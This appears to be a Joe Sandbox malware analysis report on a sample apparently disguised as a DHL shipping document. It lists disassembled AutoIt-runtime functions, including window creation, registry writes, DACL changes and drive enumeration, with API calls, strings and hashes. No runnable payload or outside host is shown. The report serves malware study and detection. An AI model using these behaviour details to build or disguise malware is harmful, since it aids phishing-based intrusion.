                                                                                            Function 008A2711 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • DestroyWindow.USER32(00000000), ref: 008A273E
                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 008A286A
                                                                                            • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 008A28A9
                                                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 008A28B9
                                                                                            • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 008A2900
                                                                                            • GetClientRect.USER32(00000000,?), ref: 008A290C
                                                                                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 008A2955
                                                                                            • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 008A2964
                                                                                            • GetStockObject.GDI32(00000011), ref: 008A2974
                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 008A2978
                                                                                            • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 008A2988
                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 008A2991
                                                                                            • DeleteDC.GDI32(00000000), ref: 008A299A
                                                                                            • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 008A29C6
                                                                                            • SendMessageW.USER32(00000030,00000000,00000001), ref: 008A29DD
                                                                                            • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 008A2A1D
                                                                                            • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 008A2A31
                                                                                            • SendMessageW.USER32(00000404,00000001,00000000), ref: 008A2A42
                                                                                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 008A2A77
                                                                                            • GetStockObject.GDI32(00000011), ref: 008A2A82
                                                                                            • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 008A2A8D
                                                                                            • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 008A2A97
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                            • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                            • API String ID: 2910397461-517079104
                                                                                            • Opcode ID: f8db8de10b42cad1e4bd5a4f6860a8a6b3d74a11519238918cb23282f4007145
                                                                                            • Instruction ID: 6c75d42d90ce44043cf85af3c07870a928579e37b9ed887a68e7e771a2f9574a
                                                                                            • Opcode Fuzzy Hash: f8db8de10b42cad1e4bd5a4f6860a8a6b3d74a11519238918cb23282f4007145
                                                                                            • Instruction Fuzzy Hash: 1BB15C71A00219AFEB24DF69DC49FAEBBA9FB49714F004214F915EB690D774ED40CBA0
                                                                                            Function 00894ADF Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetErrorMode.KERNEL32(00000001), ref: 00894AED
                                                                                            • GetDriveTypeW.KERNEL32(?,008BCB68,?,\\.\,008BCC08), ref: 00894BCA
                                                                                            • SetErrorMode.KERNEL32(00000000,008BCB68,?,\\.\,008BCC08), ref: 00894D36
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorMode$DriveType
                                                                                            • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                            • API String ID: 2907320926-4222207086
                                                                                            • Opcode ID: c0489e8f5337195d8cb82c19b8b511fbd31173668f064fa08f423cf3deb9009b
                                                                                            • Instruction ID: 2349df969a6659254fe6bcf197a1ae7a6de2e2c28764ad9a32720612c371776a
                                                                                            • Opcode Fuzzy Hash: c0489e8f5337195d8cb82c19b8b511fbd31173668f064fa08f423cf3deb9009b
                                                                                            • Instruction Fuzzy Hash: 8661C0307052499FCF04FF69CA81D6877A0FB15388B285055F816EB391EB3AED52DB42
                                                                                            Function 008B73E8 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetSysColor.USER32(00000012), ref: 008B7421
                                                                                            • SetTextColor.GDI32(?,?), ref: 008B7425
                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 008B743B
                                                                                            • GetSysColor.USER32(0000000F), ref: 008B7446
                                                                                            • CreateSolidBrush.GDI32(?), ref: 008B744B
                                                                                            • GetSysColor.USER32(00000011), ref: 008B7463
                                                                                            • CreatePen.GDI32(00000000,00000001,00743C00), ref: 008B7471
                                                                                            • SelectObject.GDI32(?,00000000), ref: 008B7482
                                                                                            • SetBkColor.GDI32(?,00000000), ref: 008B748B
                                                                                            • SelectObject.GDI32(?,?), ref: 008B7498
                                                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 008B74B7
                                                                                            • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 008B74CE
                                                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 008B74DB
                                                                                            • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 008B752A
                                                                                            • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 008B7554
                                                                                            • InflateRect.USER32(?,000000FD,000000FD), ref: 008B7572
                                                                                            • DrawFocusRect.USER32(?,?), ref: 008B757D
                                                                                            • GetSysColor.USER32(00000011), ref: 008B758E
                                                                                            • SetTextColor.GDI32(?,00000000), ref: 008B7596
                                                                                            • DrawTextW.USER32(?,008B70F5,000000FF,?,00000000), ref: 008B75A8
                                                                                            • SelectObject.GDI32(?,?), ref: 008B75BF
                                                                                            • DeleteObject.GDI32(?), ref: 008B75CA
                                                                                            • SelectObject.GDI32(?,?), ref: 008B75D0
                                                                                            • DeleteObject.GDI32(?), ref: 008B75D5
                                                                                            • SetTextColor.GDI32(?,?), ref: 008B75DB
                                                                                            • SetBkColor.GDI32(?,?), ref: 008B75E5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                            • String ID:
                                                                                            • API String ID: 1996641542-0
                                                                                            • Opcode ID: 0940d1cee0da7c2ec0d30c3c3cdab69dfbf63e9b59318b4420fcd6a599f0bce4
                                                                                            • Instruction ID: c80ca0e09a4b504aac9fac5718f3c63cf3099445789af429a87dcf7a3222084d
                                                                                            • Opcode Fuzzy Hash: 0940d1cee0da7c2ec0d30c3c3cdab69dfbf63e9b59318b4420fcd6a599f0bce4
                                                                                            • Instruction Fuzzy Hash: 4B615C72904218AFDF119FA8DC49EEEBFB9FB49320F114215F915BB2A1D7749940CBA0
                                                                                            Function 008B0FF3 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetCursorPos.USER32(?), ref: 008B1128
                                                                                            • GetDesktopWindow.USER32 ref: 008B113D
                                                                                            • GetWindowRect.USER32(00000000), ref: 008B1144
                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 008B1199
                                                                                            • DestroyWindow.USER32(?), ref: 008B11B9
                                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 008B11ED
                                                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 008B120B
                                                                                            • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 008B121D
                                                                                            • SendMessageW.USER32(00000000,00000421,?,?), ref: 008B1232
                                                                                            • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 008B1245
                                                                                            • IsWindowVisible.USER32(00000000), ref: 008B12A1
                                                                                            • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 008B12BC
                                                                                            • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 008B12D0
                                                                                            • GetWindowRect.USER32(00000000,?), ref: 008B12E8
                                                                                            • MonitorFromPoint.USER32(?,?,00000002), ref: 008B130E
                                                                                            • GetMonitorInfoW.USER32(00000000,?), ref: 008B1328
                                                                                            • CopyRect.USER32(?,?), ref: 008B133F
                                                                                            • SendMessageW.USER32(00000000,00000412,00000000), ref: 008B13AA
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                            • String ID: ($0$tooltips_class32
                                                                                            • API String ID: 698492251-4156429822
                                                                                            • Opcode ID: 761fb0b1b1946b4b83a568a4973fd9ee23eca2f2f7b0e6899a0efaed170ea093
                                                                                            • Instruction ID: 4371d5f3e8250f0cf8e8e057ee67c5fa5d672450b1dc909e4923214a4ac84106
                                                                                            • Opcode Fuzzy Hash: 761fb0b1b1946b4b83a568a4973fd9ee23eca2f2f7b0e6899a0efaed170ea093
                                                                                            • Instruction Fuzzy Hash: EAB19E71604351AFDB10DF68C898BAABBE4FF88350F40891CF999DB261D771E845CB92
                                                                                            Function 008B0241 Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CharUpperBuffW.USER32(?,?), ref: 008B02E5
                                                                                            • _wcslen.LIBCMT ref: 008B031F
                                                                                            • _wcslen.LIBCMT ref: 008B0389
                                                                                            • _wcslen.LIBCMT ref: 008B03F1
                                                                                            • _wcslen.LIBCMT ref: 008B0475
                                                                                            • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 008B04C5
                                                                                            • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 008B0504
                                                                                              • Part of subcall function 0083F9F2: _wcslen.LIBCMT ref: 0083F9FD
                                                                                              • Part of subcall function 0088223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00882258
                                                                                              • Part of subcall function 0088223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0088228A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                            • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                            • API String ID: 1103490817-719923060
                                                                                            • Opcode ID: 8e3b07496623fb94559b4bc4c52d5036a34f9e25abcb8e8841a9f574a15ed05f
                                                                                            • Instruction ID: f30e3c9ea41b019998cca4ca9a893ae70aac8ee5d8b2de448b4f9e6ffef4bfec
                                                                                            • Opcode Fuzzy Hash: 8e3b07496623fb94559b4bc4c52d5036a34f9e25abcb8e8841a9f574a15ed05f
                                                                                            • Instruction Fuzzy Hash: A9E18D312083558BC724DF28D55096BB7E5FF99318B14455CF896EB3A2DB30ED45CB82
                                                                                            Function 00838891 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00838968
                                                                                            • GetSystemMetrics.USER32(00000007), ref: 00838970
                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0083899B
                                                                                            • GetSystemMetrics.USER32(00000008), ref: 008389A3
                                                                                            • GetSystemMetrics.USER32(00000004), ref: 008389C8
                                                                                            • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 008389E5
                                                                                            • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 008389F5
                                                                                            • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00838A28
                                                                                            • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00838A3C
                                                                                            • GetClientRect.USER32(00000000,000000FF), ref: 00838A5A
                                                                                            • GetStockObject.GDI32(00000011), ref: 00838A76
                                                                                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 00838A81
                                                                                              • Part of subcall function 0083912D: GetCursorPos.USER32(?), ref: 00839141
                                                                                              • Part of subcall function 0083912D: ScreenToClient.USER32(00000000,?), ref: 0083915E
                                                                                              • Part of subcall function 0083912D: GetAsyncKeyState.USER32(00000001), ref: 00839183
                                                                                              • Part of subcall function 0083912D: GetAsyncKeyState.USER32(00000002), ref: 0083919D
                                                                                            • SetTimer.USER32(00000000,00000000,00000028,008390FC), ref: 00838AA8
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                            • String ID: AutoIt v3 GUI
                                                                                            • API String ID: 1458621304-248962490
                                                                                            • Opcode ID: aac56a2cff718a83173a6095c7b3f7da4e97a23b2e5fa36d520c5ad520208eb0
                                                                                            • Instruction ID: 3c60753b8da929924323be31de87b0ad36320ac8e9991d176114a2ab0e27b94d
                                                                                            • Opcode Fuzzy Hash: aac56a2cff718a83173a6095c7b3f7da4e97a23b2e5fa36d520c5ad520208eb0
                                                                                            • Instruction Fuzzy Hash: E3B13971A0020ADFDF14DFA8CD49BAA7BA5FB48354F108229FA15E7294DB74E850CB91
                                                                                            Function 00880D8B Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 008810F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00881114
                                                                                              • Part of subcall function 008810F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00880B9B,?,?,?), ref: 00881120
                                                                                              • Part of subcall function 008810F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00880B9B,?,?,?), ref: 0088112F
                                                                                              • Part of subcall function 008810F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00880B9B,?,?,?), ref: 00881136
                                                                                              • Part of subcall function 008810F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0088114D
                                                                                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00880DF5
                                                                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00880E29
                                                                                            • GetLengthSid.ADVAPI32(?), ref: 00880E40
                                                                                            • GetAce.ADVAPI32(?,00000000,?), ref: 00880E7A
                                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00880E96
                                                                                            • GetLengthSid.ADVAPI32(?), ref: 00880EAD
                                                                                            • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00880EB5
                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00880EBC
                                                                                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00880EDD
                                                                                            • CopySid.ADVAPI32(00000000), ref: 00880EE4
                                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00880F13
                                                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00880F35
                                                                                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00880F47
                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00880F6E
                                                                                            • HeapFree.KERNEL32(00000000), ref: 00880F75
                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00880F7E
                                                                                            • HeapFree.KERNEL32(00000000), ref: 00880F85
                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00880F8E
                                                                                            • HeapFree.KERNEL32(00000000), ref: 00880F95
                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00880FA1
                                                                                            • HeapFree.KERNEL32(00000000), ref: 00880FA8
                                                                                              • Part of subcall function 00881193: GetProcessHeap.KERNEL32(00000008,00880BB1,?,00000000,?,00880BB1,?), ref: 008811A1
                                                                                              • Part of subcall function 00881193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00880BB1,?), ref: 008811A8
                                                                                              • Part of subcall function 00881193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00880BB1,?), ref: 008811B7
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                            • String ID:
                                                                                            • API String ID: 4175595110-0
                                                                                            • Opcode ID: 6571b1d54e5c3076ba6182b46db217bd795fca4c7973c1bc51a00e693167b964
                                                                                            • Instruction ID: 47c3ed3dd8f2d3341a687dfa9524cd0445198bfac27f5224965a67ebc48ff926
                                                                                            • Opcode Fuzzy Hash: 6571b1d54e5c3076ba6182b46db217bd795fca4c7973c1bc51a00e693167b964
                                                                                            • Instruction Fuzzy Hash: 47715E7190420AABDF60AFA4DC48FAEBBB8FF05350F148215FA59E6191DB719909CF60
                                                                                            Function 008AC3B7 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 008AC4BD
                                                                                            • RegCreateKeyExW.ADVAPI32(?,?,00000000,008BCC08,00000000,?,00000000,?,?), ref: 008AC544
                                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 008AC5A4
                                                                                            • _wcslen.LIBCMT ref: 008AC5F4
                                                                                            • _wcslen.LIBCMT ref: 008AC66F
                                                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 008AC6B2
                                                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 008AC7C1
                                                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 008AC84D
                                                                                            • RegCloseKey.ADVAPI32(?), ref: 008AC881
                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 008AC88E
                                                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 008AC960
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                                            • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                            • API String ID: 9721498-966354055
                                                                                            • Opcode ID: a18865a08d175e52570e0580d4d1c5d17808d1d0be671560ac09d653eb7bb72d
                                                                                            • Instruction ID: 217dcab8158d6ae91ecddbce245f8470dc6e44093aac99e4621e9ad3ca3290c9
                                                                                            • Opcode Fuzzy Hash: a18865a08d175e52570e0580d4d1c5d17808d1d0be671560ac09d653eb7bb72d
                                                                                            • Instruction Fuzzy Hash: 011278356042119FDB14DF19D881A2AB7E5FF89714F04886CF89ADB7A2DB35EC41CB82
                                                                                            Function 008B091E Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CharUpperBuffW.USER32(?,?), ref: 008B09C6
                                                                                            • _wcslen.LIBCMT ref: 008B0A01
                                                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 008B0A54
                                                                                            • _wcslen.LIBCMT ref: 008B0A8A
                                                                                            • _wcslen.LIBCMT ref: 008B0B06
                                                                                            • _wcslen.LIBCMT ref: 008B0B81
                                                                                              • Part of subcall function 0083F9F2: _wcslen.LIBCMT ref: 0083F9FD
                                                                                              • Part of subcall function 00882BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00882BFA
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                            • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                            • API String ID: 1103490817-4258414348
                                                                                            • Opcode ID: 540b59b8d1a490325614e90f419cf208fd7275235f3e3bd8f2fd5f62d0a72379
                                                                                            • Instruction ID: 372007cc91bfe2f6674a3e0db2338c3811b00633ed5547521934e11afb192905
                                                                                            • Opcode Fuzzy Hash: 540b59b8d1a490325614e90f419cf208fd7275235f3e3bd8f2fd5f62d0a72379
                                                                                            • Instruction Fuzzy Hash: 32E168312083518FC714EF29C45096ABBE1FF99358B14895DF896EB3A2DB31ED45CB82
                                                                                            Function 008AC998 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: _wcslen$BuffCharUpper
